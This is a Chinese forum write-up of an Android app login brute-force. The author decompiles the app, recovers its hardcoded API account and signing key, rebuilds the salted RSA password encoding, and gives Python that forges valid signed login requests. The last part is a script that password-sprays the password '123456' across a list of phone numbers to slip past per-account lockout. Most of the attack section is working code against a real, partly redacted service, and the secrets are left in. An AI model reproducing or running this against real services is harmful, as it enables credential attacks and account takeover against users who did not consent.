[原创] 记一次APP登录爆破
发表于: 2022-8-10 11:30 8185


记一次APP登录爆破

使用工具

  1. 安卓12
  2. jadx-gui

抓取登录HTTP请求包

  1. 安装burp证书,并抓取登录请求。
POST /loginUser HTTP/1.1
Host: api.xxxx.xxxxx.com
 
apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&phone=xxxx&sign=72C132B392873B3F4F6C0872E5EC4B5A&enc=M%2F8hR0rN%2B0KwSGZ59%2FGQqWbrUgTAMZW%2FPnv2tiKlMjGmy%2Fmtu7tXSEftEkTLOoczSXH8%3D&timestamp=1658332134014
  1. 分析登录请求包可知,登录需要以下五个参数:
    1. apiaccount
    2. sign
    3. enc
    4. phone
    5. timestamp

分析参数

apiaccount

搜索关键词

 

 

此关键词为固定值vrpuc-aaf91f835147ce2d01216bd3bd5c3516

phone

手机号

timestamp

  1. 此值为当前的时间戳String.valueOf(System.currentTimeMillis())

  2. 改写为python代码

import time
# Millisecond Unix time as a decimal string, the Python counterpart of the app's
# String.valueOf(System.currentTimeMillis()).
# NOTE(review): the value is chosen by the client; whether the server enforces a
# freshness window on it is not shown on this page.
now_ms = int(time.time() * 1000)
timestamp = str(now_ms)

sign

 

 

 

 

/**
 * Builds the login call for one phone number and password.
 *
 * <p>The phone number is sent unchanged under {@code phone}. The password goes through
 * {@code e(...)} and is sent under {@code enc}. The remaining request fields
 * ({@code apiaccount}, {@code timestamp}, {@code sign}) are added by {@code a(Map)}.
 *
 * @param str  phone number of the account
 * @param str2 password entered by the user
 * @return whatever {@code c.g.b.f.b.c(...)} returns for the assembled field map
 */
public static O d(String str, String str2) {
    Map<String, String> loginFields = new HashMap<>();
    loginFields.put("phone", str);
    // e(...) is defined outside this listing; presumably it returns the encoded
    // password string that appears as "enc" in the captured request - confirm.
    loginFields.put("enc", e(str2));
    return c.g.b.f.b.c(f.h(), a(loginFields));
}
 
/**
 * Adds the fixed request fields and the request signature to the caller's fields.
 *
 * <p>The signature is computed over {@code apiaccount}, {@code timestamp} and every entry
 * of {@code map}, in key order. Caller entries are applied after the fixed ones, both in
 * the signed set and in the returned map, so they win on a key clash.
 *
 * <p>NOTE(review): {@code apiaccount} is a literal compiled into the client, so it is the
 * same for every install and readable from the APK. It cannot serve as a per-user or
 * per-device credential.
 *
 * @param map caller-supplied request fields; may be {@code null}
 * @return a new map holding the fixed fields, {@code sign}, and the caller's fields
 */
private static Map<String, String> a(Map<String, String> map) {
    Map<String, String> request = new HashMap<>();
    request.put("apiaccount", "vrpuc-aaf91f835147ce2d01216bd3bd5c3516");
    request.put("timestamp", String.valueOf(System.currentTimeMillis()));

    // Key-ordered copy of everything that gets signed.
    SortedMap<String, String> toSign = new TreeMap<>(request);
    if (map != null) {
        toSign.putAll(map);
    }
    request.put("sign", a(toSign));

    // Caller fields go in last, exactly as in the signed copy.
    if (map != null) {
        request.putAll(map);
    }
    return request;
}
 
/**
 * Computes the {@code sign} value for a key-ordered set of request fields.
 *
 * <p>Every entry with a non-empty value is written as {@code key=value&}, the fixed
 * {@code key=...} suffix is appended, and the result is passed to {@code D.d(...)} and
 * upper-cased.
 *
 * <p>NOTE(review): the signing key is a string literal inside the client. Anyone holding
 * the APK can recompute {@code sign} for arbitrary field values, so the server cannot
 * treat a valid {@code sign} as proof that the request came from the genuine app or user.
 * {@code D.d} is not part of this listing; given the 32 hex digits of {@code sign} in the
 * captured request it is presumably an MD5 hex digest - confirm.
 *
 * @param sortedMap request fields in key order
 * @return the upper-cased digest string used as {@code sign}
 */
private static String a(SortedMap<String, String> sortedMap) {
    StringBuilder canonical = new StringBuilder();
    for (Map.Entry<String, String> field : sortedMap.entrySet()) {
        String value = field.getValue();
        if (TextUtils.isEmpty(value)) {
            // Empty and null values are left out of the signed string.
            continue;
        }
        canonical.append(field.getKey()).append("=").append(value).append("&");
    }
    canonical.append("key=a0f723c011346j39w049d7bf0356b34b");
    return D.d(canonical.toString()).toUpperCase();
}
/**
 * Hashes a byte array with the named {@link MessageDigest} algorithm.
 *
 * @param bArr data to hash
 * @param str  JCA digest algorithm name passed to {@link MessageDigest#getInstance(String)}
 * @return the digest bytes, or {@code null} when {@code bArr} is {@code null} or empty, or
 *         when the algorithm is not available (the stack trace is printed in that case)
 */
private static byte[] a(byte[] bArr, String str) {
    if (bArr == null || bArr.length == 0) {
        return null;
    }
    try {
        MessageDigest digest = MessageDigest.getInstance(str);
        return digest.digest(bArr);
    } catch (NoSuchAlgorithmException e2) {
        // Unknown algorithm is reported on stderr and surfaces to the caller as null.
        e2.printStackTrace();
        return null;
    }
}
 
/**
 * Renders a byte array as two characters per byte, high nibble first.
 *
 * <p>The characters come from the {@code f10685a} table, which is declared outside this
 * listing; presumably it holds the sixteen hex digits - confirm.
 *
 * @param bArr bytes to render
 * @return the rendered string, or {@code ""} when {@code bArr} is {@code null} or empty
 */
private static String q(byte[] bArr) {
    if (bArr == null || bArr.length == 0) {
        return "";
    }
    char[] digits = f10685a;
    char[] rendered = new char[bArr.length << 1];
    int out = 0;
    for (byte value : bArr) {
        // Masking after the signed shift keeps only the four bits of each nibble.
        rendered[out++] = digits[(value >> 4) & 15];
        rendered[out++] = digits[value & 15];
    }
    return new String(rendered);
}

sign参数组合

# String that is hashed to produce `sign`: the request fields in key order
# (apiaccount, enc, phone, timestamp) followed by the app's fixed key=... suffix.
# NOTE(review): every input is either sent in the request itself or a constant taken
# from the APK, so a valid sign does not identify a user, a device or the genuine app.
sign_ori = (
    'apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&enc='
    + enc
    + '&phone=xxxxxx&timestamp='
    + tmtp
    + '&key=a0f723c011346j39w049d7bf0356b34b'
)

enc

str = phone str2 = password

 

 

 

 

 

 

 

 

 

 

大致流程

  1. 输入密码
  2. 密码 + 随机10位salt
    1. "password=" + "密码" + "&salt=" + salt
  3. 使用此函数操作密钥
/**
 * Decodes a text string into bytes, four input symbols to three output bytes.
 *
 * <p>Each input byte is mapped through the {@code f16023b} table; bytes that map to
 * {@code -1} are skipped. A {@code '='} (ASCII 61) in the third or fourth position of a
 * group ends decoding. The shape matches Base64 decoding, but the alphabet is defined by
 * {@code f16023b}, which is not part of this listing.
 *
 * <p>NOTE(review): assumes {@code f16023b} has at least 128 entries and holds values
 * 0..63 or -1 - confirm against its declaration.
 *
 * <p>NOTE(review): there is no bounds check before the second, third and fourth symbol of
 * a group are read. Input that ends inside a group without {@code '='} padding reads
 * {@code bytes[length]} and throws {@code ArrayIndexOutOfBoundsException}, so callers
 * should only pass complete, padded input.
 *
 * @param str encoded text
 * @return the decoded bytes
 * @throws UnsupportedEncodingException if a named charset is unavailable
 */
private static byte[] b(String str) throws UnsupportedEncodingException {
    int i2;
    byte b2;
    int i3;
    byte b3;
    int i4;
    byte b4;
    int i5;
    byte b5;
    // Decoded bytes are collected as chars and converted back to bytes on return.
    StringBuffer stringBuffer = new StringBuffer();
    byte[] bytes = str.getBytes("US-ASCII");
    int length = bytes.length;
    int i6 = 0;
    while (i6 < length) {
        // First symbol of the group: skip bytes that map to -1 until a valid one
        // is found or the input ends.
        while (true) {
            i2 = i6 + 1;
            b2 = f16023b[bytes[i6]];
            if (i2 >= length || b2 != -1) {
                break;
            }
            i6 = i2;
        }
        // Input ended without another valid symbol.
        if (b2 == -1) {
            break;
        }
        // Second symbol. bytes[i2] is read without checking i2 < length first.
        while (true) {
            i3 = i2 + 1;
            b3 = f16023b[bytes[i2]];
            if (i3 >= length || b3 != -1) {
                break;
            }
            i2 = i3;
        }
        if (b3 == -1) {
            break;
        }
        // Output byte 1: six bits of symbol 1 plus the top two bits of symbol 2.
        stringBuffer.append((char) ((b2 << 2) | ((b3 & 48) >>> 4)));
        // Third symbol; '=' (61) here means the group carried a single byte.
        while (true) {
            i4 = i3 + 1;
            byte b6 = bytes[i3];
            if (b6 == 61) {
                return stringBuffer.toString().getBytes("iso8859-1");
            }
            b4 = f16023b[b6];
            if (i4 >= length || b4 != -1) {
                break;
            }
            i3 = i4;
        }
        if (b4 == -1) {
            break;
        }
        // Output byte 2: low four bits of symbol 2 plus the top four bits of symbol 3.
        stringBuffer.append((char) (((b3 & 15) << 4) | ((b4 & 60) >>> 2)));
        // Fourth symbol; '=' (61) here means the group carried two bytes.
        while (true) {
            i5 = i4 + 1;
            byte b7 = bytes[i4];
            if (b7 == 61) {
                return stringBuffer.toString().getBytes("iso8859-1");
            }
            b5 = f16023b[b7];
            if (i5 >= length || b5 != -1) {
                break;
            }
            i4 = i5;
        }
        if (b5 == -1) {
            break;
        }
        // Output byte 3: low two bits of symbol 3 plus all six bits of symbol 4.
        stringBuffer.append((char) (b5 | ((b4 & 3) << 6)));
        i6 = i5;
    }
    // ISO-8859-1 maps chars 0..255 one-to-one onto bytes.
    return stringBuffer.toString().getBytes("iso8859-1");
}
  1. RSA加密
// Only the algorithm name is given, so mode and padding are whatever the installed
// provider uses by default for "RSA".
// NOTE(review): name the full transformation explicitly (an OAEP padding is the usual
// choice) so the padding scheme does not depend on the provider.
// Encrypting under the public key hides the password on the wire, but any client can
// produce a valid ciphertext for any candidate password, so limiting repeated guesses
// has to happen on the server.
Cipher rsa = Cipher.getInstance("RSA");
rsa.init(Cipher.ENCRYPT_MODE, publicKey); // Cipher.ENCRYPT_MODE is the constant 1
return rsa.doFinal(bArr);
  1. 使用此函数处理加密后的结果
/**
 * Encodes bytes as text, three input bytes to four symbols from the {@code f16022a} table.
 *
 * <p>A one-byte tail is written as two symbols plus {@code "=="}, a two-byte tail as three
 * symbols plus {@code "="}. The table is declared outside this listing; the captured
 * {@code enc} value contains {@code +}, {@code /} and {@code =}, so it is presumably the
 * standard Base64 alphabet - confirm.
 *
 * @param bArr bytes to encode; must not be {@code null}
 * @return the encoded text
 */
public static String a(byte[] bArr) {
    StringBuilder encoded = new StringBuilder();
    final int total = bArr.length;
    // The decompiler substituted an unrelated library constant for the mask literal;
    // presumably 0xF0 (the upper nibble) - confirm.
    final int upperNibble = PsExtractor.VIDEO_STREAM_MASK;
    for (int pos = 0; pos < total; pos += 3) {
        int first = bArr[pos] & 255;
        encoded.append(f16022a[first >>> 2]);
        if (pos + 1 == total) {
            // One byte left: the second symbol carries only the low two bits.
            encoded.append(f16022a[(first & 3) << 4]).append("==");
            break;
        }
        int second = bArr[pos + 1] & 255;
        encoded.append(f16022a[((first & 3) << 4) | ((second & upperNibble) >>> 4)]);
        if (pos + 2 == total) {
            // Two bytes left: the third symbol carries only the low four bits.
            encoded.append(f16022a[(second & 15) << 2]).append("=");
            break;
        }
        int third = bArr[pos + 2] & 255;
        encoded.append(f16022a[((second & 15) << 2) | ((third & 192) >>> 6)]);
        encoded.append(f16022a[third & 63]);
    }
    return encoded.toString();
}

改写为python代码

def main(phone,password):
    """Send one login request for ``phone`` / ``password`` and print the response body.

    Rebuilds the five request fields described above: the fixed ``apiaccount``, the
    phone number, a millisecond ``timestamp``, ``enc`` (the password plus salt, passed
    through ``gen_enc``) and ``sign`` (``gen_sign`` over the key-ordered fields plus the
    fixed key suffix). ``gen_enc``, ``gen_sign``, ``quote_plus`` and ``requests`` are
    defined or imported outside this listing.

    NOTE(review): as far as this page shows, nothing in the request is bound to a
    device, a session or a server-issued nonce, so repeated login failures can only be
    limited on the server side.
    """
    url = "https://xx.com/loginUser"
    tmtp = str(int(time.time() * 1000))

    # The app draws 10 random digits for the salt; this script sends a constant.
    salt = "1234567890"
    enc = gen_enc("password=" + password + "&salt=" + salt)

    # Signed string: fields in key order, then the fixed key suffix.
    sign_ori = (
        'apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&enc=' + enc
        + '&phone=' + phone
        + '&timestamp=' + tmtp
        + '&key=a0f723c011346j39w049d7bf0356b34b'
    )
    sign = gen_sign(sign_ori)

    # enc is signed in raw form but sent URL-encoded.
    enc_quoted = quote_plus(enc)
    print(enc_quoted)

    data = (
        "apiaccount=vrpuc-aaf91f835147ce2d01216bd3bd5c3516&phone=" + phone
        + "&sign=" + sign
        + "&enc=" + enc_quoted
        + "&timestamp=" + tmtp
    )

    res = requests.post(url=url, data=data)
    print(res.text)

加载字典爆破

def main(phone, password):
    """Post the login request and print the response body.

    ``url``, ``headers`` and ``data`` are not defined in this excerpt; the request
    construction has been elided.
    """
    response = requests.post(url=url, headers=headers, data=data)
    print(response.text)
 
 
if __name__ == "__main__":
    # "phone" is a text file with one phone number per line; every number is tried
    # with the same password.
    # NOTE(review): each account sees a single failed attempt, so per-account lockout
    # thresholds are never reached. Detection has to count failed logins per source
    # and across accounts.
    with open("phone","r") as f:
        for line in f:
            main(line.strip(),"123456")
